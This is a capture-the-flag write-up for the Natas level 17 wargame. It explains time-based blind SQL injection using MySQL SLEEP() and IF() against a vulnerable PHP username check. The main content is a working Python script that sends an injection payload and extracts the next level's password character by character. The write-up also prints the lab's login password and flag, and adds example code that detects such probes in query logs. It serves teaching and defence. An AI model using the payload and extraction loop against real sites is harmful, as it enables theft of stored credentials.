Natas wargame level writeup (time-based Blind SQL injection)

Source: Internet
Author: User
Tags: urlencode

Source code (core part):

<?

/*
CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);
*/

if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas17', '<censored>');
    mysql_select_db('natas17', $link);

    // user input is concatenated straight into the query: this is the injection point
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    $res = mysql_query($query, $link);
    if($res) {
        // every response message is commented out, so the page body is empty either way
        if(mysql_num_rows($res) > 0) {
            //echo "This user exists.<br>";
        } else {
            //echo "This user doesn't exist.<br>";
        }
    } else {
        //echo "Error in query.<br>";
    }

    mysql_close($link);
} else {
?>

<form action="index.php" method="POST">
Username: <input name="username"><br>
<input type="submit" value="Check existence" />
</form>
<? } ?>

This level is similar to the previous one: it checks whether a username exists. However, this time all of the returned messages have been commented out, so we cannot use the response content for blind injection. Why bring this up here? See OWASP's article: https://www.owasp.org/index.php/Blind_SQL_Injection (I really think OWASP's classification of attacks is very accurate; I must find time to translate it). It divides blind injection into two kinds: content-based and time-based. For pages that return no clear query information (the page still comes back, but it is empty), we can use the time-based method to obtain the password blindly. For example, we use MySQL's SLEEP() function together with the IF statement (https://dev.mysql.com/doc/refman/5.7/en/miscellaneous-functions.html#function_sleep, https://dev.mysql.com/doc/refman/5.7/en/control-flow-functions.html#function_if): whenever the guessed condition holds, the query enters SLEEP() and the response is delayed instead of returning immediately, which indirectly tells us that the guess was correct, so the password can be cracked out piece by piece. Actually, I think of it this way: I remember in algorithms class the teacher said that any algorithm necessarily consumes some resource; even an empty statement such as pass still needs time. So as long as a resource is consumed, we can monitor that resource to infer information (which is somewhat like a side-channel attack).

Modify the script from the previous post and add the time library.

import httplib2
from urllib.parse import urlencode
from time import time

h = httplib2.Http()
natas17password = '8PS3H0GWBN5RD9S7GMADGQNDKHPKQ9CW'
h.add_credentials('natas17', natas17password)
# candidate alphabet: digits, upper-case and lower-case letters (62 characters)
basestr = list(chr(i) for i in range(48, 58)) + list(chr(i) for i in range(65, 91)) + list(chr(i) for i in range(97, 123))
# prefix already recovered by an earlier run; use '' to start from scratch
password = 'XVKIQDJY4OPV7WCRGDLMJ0PFSCSDJHD'
index = 0
headers = {'Content-type': 'application/x-www-form-urlencoded'}
while len(password) < len(natas17password):
    # if the guessed prefix matches, MySQL sleeps 5 s before answering; otherwise it answers at once.
    # the trailing '#' comments out the closing quote that index.php appends to the query
    forms = dict(username='natas18" and if(password like binary "' + (password + basestr[index]) + '%", sleep(5), 0) #')
    print(forms)
    time_test = time()
    resp, content = h.request('http://natas17.natas.labs.overthewire.org/index.php', 'POST', urlencode(forms), headers)
    time_test = time() - time_test
    print(time_test)
    if time_test > 5:
        # delayed response: this character is correct, start again on the next position
        password += basestr[index]
        print(password)
        index = 0
        continue
    else:
        # immediate response: try the next candidate, wrapping around when the alphabet is exhausted
        index = (index + 1) % len(basestr)
        if index == 0:
            print('wrong!')
        continue
print('Password =', password)

Note the timing: considering network delay, I set sleep to 5, which leaves a fairly large margin; from the output, an immediate return generally takes about 0.5 seconds.

Here is a thought following on from the previous post. In reality we often notice that the information an administrator returns is not minimized, such as "wrong user name", which allows content-based injection (provided the query statement can be injected at all). In fact, even a message like "wrong username or password" still permits injection, because many times we already know the username is correct (for example the admin and default device usernames on Internet of Things devices: at most the password is set differently, while the default username is mostly the same), so a content-based blind injection is still possible. And even if there is no login at all, or the login returns no information, we can still perform time-based blind injection by creating a difference in resource consumption.
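As an added example that is not part of the original writeup, the following Python code shows what the time-based technique explained above looks like from the database side, which is where it remains visible even when the page returns nothing. It scans MySQL general-query-log style lines for the two signals of the oracle: calls to SLEEP() or BENCHMARK(), and the character-by-character prefix walk produced by a guessing loop like the script above. The log lines, thread ids and timestamps are constructed for this example (they were not captured from the Natas server), and the `<timestamp> <thread id> Query <sql>` layout is assumed.

```python
"""Spot time-based blind SQL injection in MySQL general-log style lines.

Added example, not code from the original writeup.  The SAMPLE_LOG below is
constructed: three probes of the kind the extraction loop sends, one benign
lookup and one BENCHMARK() variant.  Log layout is assumed to be
'<timestamp> <thread id> Query <sql>'.
"""
import re
from collections import defaultdict

SAMPLE_LOG = """\
2019-03-01T10:00:01.000000Z 12 Query SELECT * from users where username="alice"
2019-03-01T10:00:02.000000Z 12 Query SELECT * from users where username="natas18" and if(password like binary "x%", sleep(5), 0) #"
2019-03-01T10:00:07.100000Z 12 Query SELECT * from users where username="natas18" and if(password like binary "xv%", sleep(5), 0) #"
2019-03-01T10:00:12.200000Z 12 Query SELECT * from users where username="natas18" and if(password like binary "xvK%", sleep(5), 0) #"
2019-03-01T10:00:13.000000Z 13 Query SELECT * from users where username="bob" and benchmark(5000000, md5("a"))
"""

LOG_LINE = re.compile(r'^(?P<ts>\S+)\s+(?P<thread>\d+)\s+Query\s+(?P<sql>.*)$')
# functions that burn time on purpose; ordinary application queries do not call them
TIMING_FUNC = re.compile(r'\b(sleep|benchmark)\s*\(', re.IGNORECASE)
STRING_LIT = re.compile(r'"([^"]*)"|\'([^\']*)\'')


def parse_log(text):
    """Return one dict (ts, thread, sql) per well-formed Query line."""
    return [m.groupdict() for m in map(LOG_LINE.match, text.splitlines()) if m]


def timing_function_hits(entries):
    """Queries containing SLEEP() or BENCHMARK(): the carrier of the time oracle."""
    return [e for e in entries if TIMING_FUNC.search(e['sql'])]


def literal_shape(sql):
    """Split a query into a literal-free skeleton and the list of its string literals."""
    literals = [a or b for a, b in STRING_LIT.findall(sql)]
    return STRING_LIT.sub('?', sql), literals


def _extends_by_one(prev_sql, cur_sql):
    """True when cur_sql equals prev_sql except that exactly one string literal
    grew by one character (trailing LIKE wildcards ignored)."""
    prev_shape, prev_lits = literal_shape(prev_sql)
    cur_shape, cur_lits = literal_shape(cur_sql)
    if prev_shape != cur_shape or len(prev_lits) != len(cur_lits):
        return False
    changed = [(a.rstrip('%'), b.rstrip('%')) for a, b in zip(prev_lits, cur_lits) if a != b]
    if len(changed) != 1:
        return False
    old, new = changed[0]
    return new.startswith(old) and len(new) == len(old) + 1


def prefix_walks(entries, min_steps=3):
    """Per connection, find runs of queries whose one guessed literal grows a
    character at a time: the guessing loop itself, regardless of whether the
    side channel is SLEEP(), BENCHMARK() or something else."""
    by_thread = defaultdict(list)
    for e in entries:
        by_thread[e['thread']].append(e)
    walks = []
    for thread, evs in by_thread.items():
        run = [evs[0]]
        for prev, cur in zip(evs, evs[1:]):
            if _extends_by_one(prev['sql'], cur['sql']):
                run.append(cur)
            else:
                if len(run) >= min_steps:
                    walks.append((thread, run))
                run = [cur]
        if len(run) >= min_steps:
            walks.append((thread, run))
    return walks


def report(text):
    """Summarize both signals; the walk lists the prefixes the client guessed."""
    entries = parse_log(text)
    walks = prefix_walks(entries)
    return {
        'queries': len(entries),
        'timing_calls': len(timing_function_hits(entries)),
        'walks': [(thread, [literal_shape(e['sql'])[1][-1].rstrip('%') for e in run])
                  for thread, run in walks],
    }


if __name__ == '__main__':
    print(report(SAMPLE_LOG))
```

The prefix-walk check is the more durable of the two: the delay function can be swapped or obfuscated, but an attacker extracting a secret one character at a time must send a sequence of near-identical queries whose guessed literal grows by one, and that shape survives in the log (or in a proxy's request log) even when the response body is empty.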

Flag:XVKIQDJY4OPV7WCRGDLMJ0PFSCSDJHDP

